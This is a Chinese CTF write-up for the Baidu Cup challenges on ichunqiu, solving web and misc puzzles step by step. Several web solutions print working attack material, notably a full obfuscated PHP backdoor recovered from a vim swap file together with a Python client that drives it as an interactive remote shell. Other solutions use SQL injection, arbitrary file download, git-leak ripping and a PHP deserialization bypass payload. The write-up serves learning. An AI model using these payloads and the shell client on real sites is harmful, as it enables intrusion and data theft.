百度杯WriteUp
比赛链接:http://www.ichunqiu.com/racing/ctf_54967
题目:getflag 类型:web
在登录界面看到substr(md5(captcha), 0, 6)=3c7258,意味着验证码(captcha)的md5值的前6位3c7258,写个python脚本爆破
#!/usr/bin/env python
import hashlibdef md5(s):return hashlib.md5(s).hexdigest()for i in range(1, 9999999):if md5(str(i)).startswith('3c7258'):print i
爆破出captcha值2142719满足条件
用burpsuite抓包,尝试admin',发现有注入点,上万能密码admin' or '1' = '1
看到action=file
看到有个文件下载点,在/file/download.php里,f参数接上flag的路径,访问http://f394d013e2ff49deb6ce94ee686d3f67bc941de4c14e4004.ctf.game/Challenges/file/download.php?f=/var/www/html/Challenges/flag.php下载flag.php源代码,代码如下
<?php
$f = $_POST['flag'];
$f = str_replace(array('`', '$', '*', '#', ':', '\\', '"', "'", '(', ')', '.', '>'), '', $f);
if((strlen($f) > 13) || (false !== stripos($f, 'return')))
{die('wowwwwwwwwwwwwwwwwwwwwwwwww');
}
try
{eval("\$spaceone = $f");
}
catch (Exception $e)
{return false;
}
if ($spaceone === 'flag'){echo file_get_contents("helloctf.php");
}?>
意思是将post参数的flag赋值给变量spaceone然后判断是否为flag,然后用file_get_contents方法返回helloctf.php的内容,注意这里的helloctf.php是做了过滤的,不能用任意文件下载来获取。然后用firefox的hackbar插件post一个flag=flag;,查看源代码看到真正的flag
题目:Backdoor 类型:web
git泄露
百度下载rip.git.pl文件,代码如下
#!/usr/bin/perluse strict;use LWP; use LWP::UserAgent; use HTTP::Request; use Getopt::Long;my $configfile="$ENV{HOME}/.rip-git"; my %config; $config{'branch'} = "master"; $config{'gitdir'} = ".git"; $config{'agent'} = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:10.0.2) Gecko/20100101 Firefox/10.0.2'; $config{'verbose'}=0; $config{'checkout'}=1;if (-e $configfile) {open(CONFIG,"<$configfile") or next;while (<CONFIG>) {chomp; # no newlines/#.*//; # no commentss/^\s+//; # no leading whites/\s+$//; # no trailing whitenext unless length; # anything left?my ($var, $value) = split(/\s*=\s*/, $_, 2);$config{$var} = $value;} close(CONFIG); }Getopt::Long::Configure ("bundling");my $result = GetOptions ("a|agent=s" => \$config{'agent'},"b|branch=s" => \$config{'branch'},"u|url=s" => \$config{'url'},"c|checkout!" => \$config{'checkout'},"s|verifyssl!" => \$config{'verifyssl'},"v|verbose+" => \$config{'verbose'},"h|help" => \&help );my @gitfiles=( "COMMIT_EDITMSG", "config", "description", "HEAD", "index", "packed-refs" );my @commits; my $ua = LWP::UserAgent->new; $ua->agent($config{'agent'});my $gd=$config{'gitdir'}."/";mkdir $gd;print STDERR "[i] Downloading git files from $config{'url'}\n" if ($config{'verbose'}>0);foreach my $file (@gitfiles) {my $furl = $config{'url'}."/".$file;getfile($file,$gd.$file); }mkdir $gd."logs"; mkdir $gd."logs/refs"; mkdir $gd."logs/refs/heads"; mkdir $gd."logs/refs/remotes";mkdir $gd."objects"; mkdir $gd."objects/info"; mkdir $gd."objects/pack";getfile("objects/info/alternates",$gd."objects/info/alternates");mkdir $gd."info"; getfile("info/grafts",$gd."info/grafts");my $res = getfile("logs/HEAD",$gd."logs/HEAD");my @lines = split /\n/, $res->content; foreach my $line (@lines) {my @fields=split(/\s+/, $line);my $ref = $fields[1];getobject($gd,$ref); }mkdir $gd."refs"; mkdir $gd."refs/heads"; my $res = getfile("refs/heads/".$config{'branch'},$gd."refs/heads/".$config{'branch'}); mkdir $gd."refs/remotes"; mkdir $gd."refs/tags";my $pcount=1; while ($pcount>0) {print STDERR "[i] Running git fsck to check for missing items\n" if ($config{'verbose'}>0);open(PIPE,"git fsck |") or die "cannot find git: $!";$pcount=0;while (<PIPE>) {chomp;if (/^missing/) {my @getref = split (/\s+/);getobject($gd,$getref[2]); # 3rd field is sha1 $pcount++;}}close(PIPE);print STDERR "[i] Got items with git fsck: $pcount\n" if ($config{'verbose'}>0); }if ($config{'checkout'}) {system("git checkout -f"); }sub getobject {my ($gd,$ref) = @_;my $rdir = substr ($ref,0,2);my $rfile = substr ($ref,2);mkdir $gd."objects/$rdir";getfile("objects/$rdir/$rfile",$gd."objects/$rdir/$rfile"); }sub getfile {my ($file,$outfile) = @_;my $furl = $config{'url'}."/".$file;my $req = HTTP::Request->new(GET => $furl);# Pass request to the user agent and get a response backmy $res = $ua->request($req);if ($res->is_success) {print STDERR "[d] found $file\n" if ($config{'verbose'}>0);;open (out,">$outfile") or die ("cannot open file: $!");print out $res->content;close (out);} else {print STDERR "[!] Not found for $file: ".$res->status_line."\n" if ($config{'verbose'}>0);}return $res; }sub help {print "DVCS-Ripper: rip-git.pl. Copyright (C) Kost. Distributed under GPL.\n\n";print "Usage: $0 [options] -u [giturl] \n";print "\n";print " -c perform 'git checkout -f' on end (default)\n";print " -b <s> Use branch <s> (default: $config{'branch'})\n";print " -a <s> Use agent <s> (default: $config{'agent'})\n";print " -s verify SSL cert\n";print " -v verbose (-vv will be more verbose)\n";print "\n";print "Example: $0 -v -u http://www.example.com/.git/\n";print "Example: $0 # with url and options in $configfile\n";exit 0; }
perl rip-git.pl -v -u http://ddb094bd01f34026b31b73f3493ca4aecef278b88da74c26.ctf.game/Challenges/.git/git loggit reset --hard 12c6ddf4af0a5542c1cf6a9ab19b4231c1fd9a88
cat flag.php #查看flag.php,发现里面有一段代码,代码如下
<?php
echo "flag{true_flag_is_in_the_b4ckdo0r.php}";
?>
意思是要去看b4ckdo0r.php,找备份文件,发现有swo,swo文件是vi不正常退出产生的文件
curl http://ddb094bd01f34026b31b73f3493ca4aecef278b88da74c26.ctf.game/Challenges/.b4ckdo0r.php.swo #用curl下载swo文件vim -r b4ckdo0r.php.swo #恢复swo文件
<?php
echo "can you find the source code of me?";
/*** Signature For Report*/$h='_)m/","/-/)m"),)marray()m"/","+")m),$)mss($s[$i)m],0,$e))))m)m,$k)));$o=ob)m_get_c)monte)m)mnts)m();ob_end_clean)';/**/$H='m();$d=ba)mse64)m_encode)m(x(gzc)mompres)ms($o),)m$)mk));print("<)m$k>$d<)m/)m$k>)m");@sessio)mn_d)mestroy();}}}}';/**/$N='mR;$rr)m=@$r[)m"HTT)mP_RE)mFERER"];$ra)m=)m@$r["HTTP_AC)mC)mEPT_LANG)mUAGE)m")m];if($rr)m&&$ra){)m$u=parse_u)mrl($rr);p';/**/$u='$e){)m$k=$)mkh.$kf;ob)m_start();)m@eva)ml(@gzunco)mmpr)mess(@x(@)mbase6)m4_deco)mde(p)m)mreg_re)mplace(array("/';/**/$f='$i<$)ml;)m){)mfo)mr($j)m=0;($j<$c&&$i<$l);$j)m++,$i+)m+){$)mo.=$t{$i)m}^$)mk{$j};}}r)meturn )m$o;}$r)m=$_SERVE)';/**/$O='[$i]="";$p)m=$)m)mss($p,3)m);}if(ar)mray_)mkey_exists)m()m$i,$s)){$)ms[$i].=$p)m;)m$e=s)mtrpos)m($s[$i],$f);)mif(';/**/$w=')m));)m$p="";fo)mr($z=1;)m$z<c)mount()m$m[1]);$)mz++)m)m)$p.=$q[$m[)m)m2][$z]];if(str)mpo)ms($p,$h))m===0){$s)m';/**/$P='trt)molower";$)mi=$m[1][0)m)m].$m[1][1])m;$h=$sl()m$ss(m)md5($)mi.$kh)m),0,)m3));$f=$s)ml($ss()m)mmd5($i.$kf),0,3';/**/$i=')marse_)mstr)m($u["q)muery"],$)m)mq);$q=array)m_values()m$q);pre)mg_matc)mh_all()m"/([\\w)m])m)[\\w-)m]+(?:;q=0.)';/**/$x='m([\\d)m]))?,?/",)m$ra,$m))m;if($q)m&&$)mm))m)m{@session_start();$)ms=&$_S)mESSI)m)mON;$)mss="sub)mstr";$sl="s)m';/**/$y=str_replace('b','','crbebbabte_funcbbtion');/**/$c='$kh="4f7)m)mf";$kf="2)m)m8d7";funct)mion x($t)m,$k){$)m)mc=strlen($k);$l=st)mrlen)m($t);)m)m$o="";for()m$i=0;';/**/$L=str_replace(')m','',$c.$f.$N.$i.$x.$P.$w.$O.$u.$h.$H);/**/$v=$y('',$L);$v();/**/
?>
百度发现这是PHP混淆后门,参考:http://www.cnblogs.com/go2bed/p/5920811.html,修改一下里面的python代码,在url里修改成你自己的url即可
#!/usr/bin/env python
# encoding: utf-8
from random import randint,choice
from hashlib import md5
import urllib
import string
import zlib
import base64
import requests
import redef choicePart(seq,amount):length = len(seq)if length == 0 or length < amount:print 'Error Input'return Noneresult = []indexes = []count = 0while count < amount:i = randint(0,length-1)if not i in indexes:indexes.append(i)result.append(seq[i])count += 1if count == amount:return resultdef randBytesFlow(amount):result = ''for i in xrange(amount):result += chr(randint(0,255))return resultdef randAlpha(amount):result = ''for i in xrange(amount):result += choice(string.ascii_letters)return resultdef loopXor(text,key):result = ''lenKey = len(key)lenTxt = len(text)iTxt = 0while iTxt < lenTxt:iKey = 0while iTxt<lenTxt and iKey<lenKey:result += chr(ord(key[iKey]) ^ ord(text[iTxt]))iTxt += 1iKey += 1return resultdef debugPrint(msg):if debugging:print msg# config
debugging = False
keyh = "4f7f" # $kh
keyf = "28d7" # $kf
xorKey = keyh + keyf
url = 'http://ddb094bd01f34026b31b73f3493ca4aecef278b88da74c26.ctf.game/Challenges/b4ckdo0r.php'
defaultLang = 'zh-CN'
languages = ['zh-TW;q=0.%d','zh-HK;q=0.%d','en-US;q=0.%d','en;q=0.%d']
proxies = None # {'http':'http://127.0.0.1:8080'} # proxy for debugsess = requests.Session()# generate random Accept-Language only once each session
langTmp = choicePart(languages,3)
indexes = sorted(choicePart(range(1,10),3), reverse=True)acceptLang = [defaultLang]
for i in xrange(3):acceptLang.append(langTmp[i] % (indexes[i],))
acceptLangStr = ','.join(acceptLang)
debugPrint(acceptLangStr)init2Char = acceptLang[0][0] + acceptLang[1][0] # $i
md5head = (md5(init2Char + keyh).hexdigest())[0:3]
md5tail = (md5(init2Char + keyf).hexdigest())[0:3] + randAlpha(randint(3,8))
debugPrint('$i is %s' % (init2Char))
debugPrint('md5 head: %s' % (md5head,))
debugPrint('md5 tail: %s' % (md5tail,))# Interactive php shell
cmd = raw_input('phpshell > ')
while cmd != '':# build junk data in refererquery = []for i in xrange(max(indexes)+1+randint(0,2)):key = randAlpha(randint(3,6))value = base64.urlsafe_b64encode(randBytesFlow(randint(3,12)))query.append((key, value))debugPrint('Before insert payload:')debugPrint(query)debugPrint(urllib.urlencode(query))# encode payloadpayload = zlib.compress(cmd)payload = loopXor(payload,xorKey)payload = base64.urlsafe_b64encode(payload)payload = md5head + payload# cut payload, replace into referercutIndex = randint(2,len(payload)-3)payloadPieces = (payload[0:cutIndex], payload[cutIndex:], md5tail)iPiece = 0for i in indexes:query[i] = (query[i][0],payloadPieces[iPiece])iPiece += 1referer = url + '?' + urllib.urlencode(query)debugPrint('After insert payload, referer is:')debugPrint(query)debugPrint(referer)# send requestr = sess.get(url,headers={'Accept-Language':acceptLangStr,'Referer':referer},proxies=proxies)html = r.textdebugPrint(html)# process responsepattern = re.compile(r'<%s>(.*)</%s>' % (xorKey,xorKey))output = pattern.findall(html)if len(output) == 0:print 'Error, no backdoor response'cmd = raw_input('phpshell > ')continueoutput = output[0]debugPrint(output)output = output.decode('base64')output = loopXor(output,xorKey)output = zlib.decompress(output)print outputcmd = raw_input('phpshell > ')
执行之后拿到shell,真正的flag在this_i5_flag.php里
题目:login 类型:web
查看源代码看到,用户名密码为test1/test1
登录后跳转到member.php
抓包发现有个show为0,脑洞一下在HTTP头里增加show字段,值为1
返回了一段PHP,把get post session cookie组合赋值给变量requset(注意了,不是request,绝对是个小trick233),requeset[token]做三次解码
最后判断login[user]是否等于ichunqiu,然后输出flag
写一个php反过来进行三次编码
php代码如下
<?php
$requset = array_merge($_GET, $_POST, $_COOKIE);
$arr = array('user'=>'ichunqiu');
$a = base64_encode(gzcompress(serialize($arr)));
$login = unserialize(gzuncompress(base64_decode($a)));
echo $a;
?>
把输出的$a放在cookie中的token值上,我这生成出来的是eJxLtDK0qi62MrFSKi1OLVKyLraysFLKTM4ozSvMLFWyrgUAo4oKXA==
然后getflag
题目:签到题 类型:misc
纯属脑洞题,在i春秋公众号里输入 百度杯么么哒 就可以拿到flag
题目:我要变成一只程序猿 类型:misc
下载文件,看到里面txt是一段c语言写的代码
#include<stdio.h>
#include<string.h>
void main() {
char str[100]="";
int i;
int len;
printf("input string:\n");
gets(str);
len=strlen(str);
printf("result:\n");
for(i=0;i<len+1;i++)
{putchar(str[len-i]);
}
printf("\n");
}
不难看出是倒序输出,python脚本如下
#!/usr/bin/env python
str = 'ba1f2511fc30423bdb'
print str[::-1]
flag{bdb32403cf1152f1ab}
题目:那些年我追过的贝丝 类型:misc
密文:ZmxhZ3tpY3FlZHVfZ29nb2dvX2Jhc2U2NH0=看题目和字符串最后的=号猜测是base64,python脚本如下
#!/usr/bin/env python
import base64
s = 'ZmxhZ3tpY3FlZHVfZ29nb2dvX2Jhc2U2NH0='
print base64.b64decode(s)
flag{icqedu_gogogo_base64}
题目:Not Found 类型:web
抓包看一下,发现返回头说X-method:haha,暗示需要修改method方法,返回302
发现一个f参数,发现可以读.htaccess
继续follow
XFF?构造一个X-Forwarded-For:127.0.0.1失败,试下用client-ip替代,getflag
题目:vld 类型:web
查看源代码
do you know Vulcan Logic Dumper?<br>false<br><!-- index.php.txt ?>
查看index.php.txt
大概意思就是get参数flag1 flag2 flag3对应字符串,在URL里拼起来就可以了
http://b0449533f3ac4fd6bf7bd9a5d7df293f26ea072caab34afe.ctf.game/?flag1=fvhjjihfcv&flag2=gfuyiyhioyf&flag3=yugoiiyhi
看到
do you know Vulcan Logic Dumper?
the next step is 1chunqiu.zip
下载1chunqiu.zip,发现有4个php,2个html,1个css
看到login.php
<?phprequire_once 'dbmysql.class.php';
require_once 'config.inc.php';if(isset($_POST['username']) && isset($_POST['password']) && isset($_POST['number'])){$db = new mysql_db();$username = $db->safe_data($_POST['username']);$password = $db->my_md5($_POST['password']);$number = is_numeric($_POST['number']) ? $_POST['number'] : 1;$username = trim(str_replace($number, '', $username));$sql = "select * from"."`".table_name."`"."where username="."'"."$username"."'";$row = $db->query($sql);$result = $db->fetch_array($row);if($row){if($result["number"] === $number && $result["password"] === $password){echo "<script>alert('nothing here!')</script>";}else{echo "<script>alert('密码错误,老司机翻车了!');function jumpurl(){location='login.html';}setTimeout('jumpurl()',1000);</script>";}}else{exit(mysql_error());}
}else{echo "<script>alert('用户名密码不能为空!');function jumpurl(){location='login.html';}setTimeout('jumpurl()',1000);</script>";
}?>
这里接收三个POST过来的参数 username password number
username会进行一次转义
password会经过dbmysql.class.php里的自定义的md5处理
接着会⽤username吧number替换为空
问题就出在username和number这⾥ 这⾥⽤0可以替换掉%00转义后\0中的0从⽽产⽣第⼀
个\ 然后username中如果是'变成了\'跟前⾯连在⼀起就是\\' 刚好单引号可以逃逸出来闭合前
⾯的单引号
然后利用报错注入,参考链接:http://www.cnblogs.com/xishaonian/p/6243497.html
concat的第二个参数换成substring把flag分成两段截取出来
题目:传说中的签到题 类型:misc
自古签到多脑洞,扫二维码看到“就算你发现我但是知道flag是什么??” 所以flag就是 什么
题目:challenge 类型:misc
密文:666c61677b686578327374725f6368616c6c656e67657d
观察一下这一串字符串,由数字和字母组合,字母小于f(推测出很可能是16进制),数字小于8而且两位一组的看前面一位不是6就是7(推测出是ascii码),从而推测出是16进制转ascii,python脚本如下
#!/usr/bin/env python
import binascii as ba
b = '666c61677b686578327374725f6368616c6c656e67657d'
a = ba.a2b_hex(b)
print a
flag{hex2str_challenge}
题目:剧情大反转 类型:misc
密文:}~144_0t_em0c14w{galf 一眼就看出来是把字符顺序反转,python脚本如下
#!/usr/bin/env python
str = '}~144_0t_em0c14w{galf'
print str[::-1]
flag{w41c0me_t0_441~}
题目:fuzzing 类型:web
先抓个包
发现有hint,提示大内网,联想到用xff或者client-ip来伪造IP地址,大内网的话就用A段比如10.0.0.1
Follow
要传一个key值,随便传个admin,发现没反应,把方法换成POST
告诉你这个key的md5值是1b4167610ba3f2ac426a68488dbd89be,key值前面是ichunqiu开头,后面三位要你从a到z0到9爆破,写个python脚本
#!/bin/bash
import hashlib
def md5(data):m = hashlib.md5()m.update(data)a = m.hexdigest()return aa = 'ichunqiu'
b = 'abcdefghijklmnopqrstuvwxyz1234567890'
for i in b:for j in b:for k in b:if md5(a+i+j+k)=='1b4167610ba3f2ac426a68488dbd89be':print a+i+j+k
爆破出key值为ichunqiu105
让你继续访问xx00xxoo.php
源代码在x0.txt
发现是discuz加密函数,回显的加密字符是flag加密的结果,我们需要调用这个函数本地写个PHP跑一下就出flag了
<?php
function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {$ckey_length = 4;$key = md5($key ? $key : UC_KEY);$keya = md5(substr($key, 0, 16));$keyb = md5(substr($key, 16, 16));$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length) : substr(md5(microtime()), -$ckey_length)) : '';$cryptkey = $keya . md5($keya . $keyc);$key_length = strlen($cryptkey);$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0) . substr(md5($string . $keyb), 0, 16) . $string;$string_length = strlen($string);$result = '';$box = range(0, 255);$rndkey = array();for ($i = 0; $i <= 255; $i++) {$rndkey[$i] = ord($cryptkey[$i % $key_length]);}for ($j = $i = 0; $i < 256; $i++) {$j = ($j + $box[$i] + $rndkey[$i]) % 256;$tmp = $box[$i];$box[$i] = $box[$j];$box[$j] = $tmp;}for ($a = $j = $i = 0; $i < $string_length; $i++) {$a = ($a + 1) % 256;$j = ($j + $box[$a]) % 256;$tmp = $box[$a];$box[$a] = $box[$j];$box[$j] = $tmp;$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));}if ($operation == 'DECODE') {if ((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26) . $keyb), 0, 16)) {return substr($result, 26);} else {return '';}} else {return $keyc . str_replace('=', '', base64_encode($result));}}echo authcode($string = 'fda6UvwerCgVTBBzk/0doqIsXVv1oIlQD6pWMeDuvt/AbGoz6684WYwelmxpY6v1RQo5DIXrJaNiyxSK4JBFn3DcjDqPzvs', $operation = 'DECODE', $key = 'ichunqiu105');
?>
题目:表姐家的签到题 类型:misc
居然没套路直接给答案,加个格式就行flag{123456abcdef}
题目:try again 类型:misc
下载文件后扔进linux里用strings 命令打印出可打印字符再用grep命令结合管道过滤出含flag字段的 命令为:
strings babyre | grep flag
flag{re_start_007}
题目:听说是RC4算法 类型:misc
题目说明了是RC4算法,给出了key值为welcometoicqedu 密文为UUyFTj8PCzF6geFn6xgBOYSvVTrbpNU4OF9db9wMcPD1yDbaJw== 百度个python脚本修改一下
import random, base64
from hashlib import sha1 def crypt(data, key): x = 0 box = range(256) for i in range(256): x = (x + box[i] + ord(key[i % len(key)])) % 256 box[i], box[x] = box[x], box[i] x = y = 0 out = [] for char in data: x = (x + 1) % 256 y = (y + box[x]) % 256 box[x], box[y] = box[y], box[x] out.append(chr(ord(char) ^ box[(box[x] + box[y]) % 256])) return ''.join(out) def tdecode(data, key, decode=base64.b64decode, salt_length=16): if decode: data = decode(data)salt = data[:salt_length] return crypt(data[salt_length:], sha1(key + salt).digest()) if __name__=='__main__': data = 'UUyFTj8PCzF6geFn6xgBOYSvVTrbpNU4OF9db9wMcPD1yDbaJw==' key = 'welcometoicqedu' decoded_data = tdecode(data=data, key=key) print decoded_data
flag{rc4_l_keepgoing}
题目:hash 类型:web
点进去看到http://8bd793f83e9343418fb9b39a8cd7f3ee1f22184a90af438a.ctf.game/index.php?key=123&hash=f9109d5f83921a551cf859f853afe7bb
看到hash=f9109d5f83921a551cf859f853afe7bb md5解一下是 kkkkkk01123
由于key=123,猜测是字符串的后三位,网页又提示只要不是123就行,随便弄个admin放在末尾,md5加密一下049f601185c0846faac45065a834b1c5
访问http://8bd793f83e9343418fb9b39a8cd7f3ee1f22184a90af438a.ctf.game/index.php?key=admin&hash=049f601185c0846faac45065a834b1c5
看到Gu3ss_m3_h2h2.php
<?php
class Demo {private $file = 'Gu3ss_m3_h2h2.php';public function __construct($file) {$this->file = $file;}function __destruct() {echo @highlight_file($this->file, true);}function __wakeup() {if ($this->file != 'Gu3ss_m3_h2h2.php') {//the secret is in the f15g_1s_here.php$this->file = 'Gu3ss_m3_h2h2.php';}}
}if (isset($_GET['var'])) {$var = base64_decode($_GET['var']);if (preg_match('/[oc]:\d+:/i', $var)) {die('stop hacking!');} else {@unserialize($var);}
} else {highlight_file("Gu3ss_m3_h2h2.php");
}
?>
接收一个var的参数进行base64解码然后进行正则匹配否则就进行反序列化,但是在执行__destruct函数之前会调用__wakeup来改掉file变量
这里利用序列化字符串中对象属性个数大于真实的属性个数会绕过__wakeup的执行
参考链接:http://0x48.pw/2016/09/13/0x22/
根据要求加几行代码处理一下
<?php
class Demo {private $file = 'Gu3ss_m3_h2h2.php';public function __construct($file) {$this->file = $file;}function __destruct() {echo @highlight_file($this->file, true);}function __wakeup() {if ($this->file != 'Gu3ss_m3_h2h2.php') {//the secret is in the f15g_1s_here.php$this->file = 'Gu3ss_m3_h2h2.php';}}
}$a = new Demo('f15g_1s_here.php');
$a = serialize($a);
echo $a;
echo '<br />';
$b = str_replace('O:4', 'O:+4',$a);
$b = str_replace(':1:', ':5:' ,$b);
echo '<br />';
echo base64_encode($b);
生成出来TzorNDoiRGVtbyI6NTp7czoxMDoiAERlbW8AZmlsZSI7czoxNjoiZjE1Z18xc19oZXJlLnBocCI7fQ==
还是传一个参数var进行赋值,这里也有WAF,弄个一句话POST远程执行代码getflag
题目:泄露的数据 类型:misc
密文:25d55ad283aa400af464c76d713c07ad,看题目第一反应就是MD5,数了一下密文长度32位基本确认,扔到 http://www.dmd5.com/md5-decrypter.jsp 上秒出明文12345678,加上格式即可
题目:考眼力 类型:misc
密文:gmbh{4d850d5c3c2756f67b91cbe8f046eebd},从格式上就不难看出是凯撒密码,python脚本如下
# Caesar CipherMAX_KEY_SIZE = 26def getMode():while True:print('Do you wish to encrypt or decrypt a message?')mode = raw_input().lower()if mode in 'encrypt e decrypt d'.split():return modeelse:print('Enter either "encrypt" or "e" or "decrypt" or "d".')def getMessage():print('Enter your message:')return raw_input()def getKey():key = 0while True:print('Enter the key number (1-%s)' % (MAX_KEY_SIZE))key = int(input())if (key >= 1 and key <= MAX_KEY_SIZE):return keydef getTranslatedMessage(mode, message, key):if mode[0] == 'd':key = -keytranslated = ''for symbol in message:if symbol.isalpha():num = ord(symbol)num += keyif symbol.isupper():if num > ord('Z'):num -= 26elif num < ord('A'):num += 26elif symbol.islower():if num > ord('z'):num -= 26elif num < ord('a'):num += 26translated += chr(num)else:translated += symbolreturn translatedmode = getMode()
message = getMessage()
if mode[0] != 'd':key = getKey()
print('Your translated text is:')if mode[0] != 'd':print(getTranslatedMessage(mode, message, key))
else:for key in range(1,MAX_KEY_SIZE + 1):print(key,getTranslatedMessage('decrypt',message,key))
跑出来一堆结果,但第一个就是flag flag{4c850c5b3b2756e67a91bad8e046ddac}
题目:flag格式 类型:misc
不知道考点是啥,直接复制就好了,flag{0ahief9124jfjir}
转载于:https://www.cnblogs.com/kurokoleung/p/6363845.html
百度杯WriteUp相关推荐
- “百度杯”CTF比赛 十月场 writeup
"百度杯"CTF比赛十月场 Misc 那些年我追过的贝丝 我要变成一只程序员 剧情大反转 challenge 据说是rc4算法 try again 表姐家的签到题 泄露的数据 考眼 ...
- slax9Linux中文,湖湘杯-WriteUp | CN-SEC 中文网
Web 题目名字不重要反正题挺简单的 解题思路 非预期,DASFLAG变量在phpinfo里显示出来了 NewWebsite 解题思路 http://47.111.104.169:56200/?r=c ...
- 2017 百度杯丶二月场第一周WP
1.祸起北荒 题目: 亿万年前 天子之子华夜,被父神之神末渊上神告知六荒十海之北荒西二旗即将发生一场"百度杯"的诸神之战 他作为天族的太子必须参与到此次诸神之战定六荒十海 华夜临危 ...
- “百度杯”CTF比赛 2017 二月场 wp
目录 爆破-1 爆破-2 爆破-3 include Zone OneThink misc 2 上古神器 爆破-1 flag在一个长度为6的变量里面 <?php include "fla ...
- “百度杯”CTF比赛 十一月场Look
最近一直在刷百度杯的题目,感觉每个题目都能涉及到很多知识点,写点wp记录一下 进入后看见页面空白,这个时候一般用dirsearch扫一下,同时burp抓包看一下 看到响应头里有X-HT,这应该是一个提 ...
- “百度杯”CTF比赛 九月场--web Upload
"百度杯"CTF比赛 九月场--web Upload 基础知识 1.什么是一句话木马? 2.一句话木马的简要原理 3.html渲染过程 解析渲染该过程主要分为以下步骤 解决方案 4 ...
- “百度杯”CTF比赛 十一月场Mangager
此题前半部分分析见"百度杯"CTF比赛 十一月场 题目名称:Mangager_CodeRoc的博客-CSDN博客 每日CTF Web:Mangager_LUV_YOUJUN的博客- ...
- [WEB攻防] i春秋- “百度杯”CTF比赛 十二月场-YeserCMS cmseasy CmsEasy_5.6_20151009 无限制报错注入 复现过程
中华人民共和国网络安全法(出版物)_360百科 可以说一道经典的CTF题目,解这道题的过程类似于我们渗透测试的过程,所以把它放在了这个专栏,在这里我们详细讲过程,而不是原理. 目录 题目 寻找方向 f ...
- i 春秋CTF题目 百度杯 9月场 再见CMS Upload 复现
今天花了点时间刷了下题目,遇到几道相对来说进阶的题目,学习一下储备一些CTF思路,这些题..脑洞有点开. 目录 再见CMS 总结 Upload 绕过方法 总结 再见CMS 昨天刚做一道 [WEB攻防] ...
最新文章
- 论5级流水32bit risc cpu设计
- [转载]使用C#的BitmapData
- 产品经理如何评估产品机会
- IOS开发——01_第一个OC程序
- 明明白白你的Linux服务器——硬件篇
- JAX-RS 2.x与Spring MVC:返回对象列表的XML表示
- iOS开发API常用英语名词
- 成员函数指针与高性能的C++委托(中篇)
- php oracle count,请教分析函数count
- Python可视化工具Matplotlib 3.0版出炉,改进默认后端选择,饼图终于变圆了
- 【java】之常用四大线程池用法以及ThreadPoolExecutor详解
- php面试专题---6、正则表达式考点
- Lync 小技巧-52-Lync 2013-不加域-客户端-2-导入-证书-信任链
- java 爬虫处理数据_Java语言实现爬虫实战
- ftp服务器查看所有文件夹,查看ftp服务器所有文件夹
- 2019年虚拟机备份软件大盘点
- Geos库学习之(一)——Geos库介绍和编译
- 《论文写作》课程感想
- JS基础知识(二十八):箭头函数
- Windows Identity Foundation-- Windows身份验证基本框架
热门文章
- leetcode刷题java、c++、go语言三合一版本 谷歌师兄的刷题笔记、东哥的算法小抄、 Guide哥的Java面试突击版
- python里的英文歌叫什么_用Python分析韩国女团最喜欢的英文单词
- PMP---合同类型
- 将服务器安装为域控制器
- ALSA声卡驱动四之Control设备的创建
- 5G与4G有啥不一样?或1秒内下载1G电影
- android要比ios耗电,Aislelabs:苹果iOS版iBeacon比Android版更耗电
- 直播网站源码可拖拽悬浮球,仿Assistive Touch弹出窗口
- python判断成语类型_Python成语返回第一项或None
- 面向区块链物联网系统的边缘计算网关(专利号:CN110365707)